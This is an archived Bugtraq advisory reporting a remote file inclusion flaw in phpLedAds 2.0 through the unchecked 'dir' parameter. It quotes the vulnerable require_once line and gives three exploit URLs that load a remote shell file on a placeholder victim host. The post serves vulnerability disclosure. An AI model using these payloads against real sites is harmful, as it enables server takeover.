phpLedAds 2.0(dir) File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpLedAds 2.0(dir) File Include
From: "mahmood ali" <mah_k_2000@xxxxxxxxxxx>
Date: Fri, 27 Oct 2006 18:10:40 +0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

###################################################
phpLedAds 2.0(dir) File Include
###################################################
Source Code:

ftp://ftp1.comscripts.com/PHP/175_phpledad-20.zip

###################################################
Vulnerable Code:_

click.php & ledad.php & ledad_js.php

###################################################
In Line 41 :_

require_once($dir . '/ad_class.php');

###################################################
Exploit :_

http://www.VicTim.com/[ledads]/click.php?dir=Sh3ll.txt?
http://www.VicTim.com/[ledads]/ledad.php?dir=Sh3ll.txt?
http://www.VicTim.com/[ledads]/ledad_js.php?dir=Sh3ll.txt?

###################################################

Discoverd By :  Mahmood_ali

###################################################

Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM &WwW.Tryag.CoM


###################################################

_________________________________________________________________

Windows Live? Messenger has arrived. Click here to download it for free!http://imagine-msn.com/messenger/launch80/?locale=en-gb

Follow-Ups:
- Re: phpLedAds 2.0(dir) File Include
  - From: Stefano Zanero

Prev by Date: PLS-Bannieres 1.21 (bannieres.php) File Include
Next by Date: [funsec] Haxdoor: UK Police Count 8, 500 Victims in Data Theft (So Far) (fwd)
Previous by thread: Re: PLS-Bannieres 1.21 (bannieres.php) File Include
Next by thread: Re: phpLedAds 2.0(dir) File Include
Index(es):
- Date
- Thread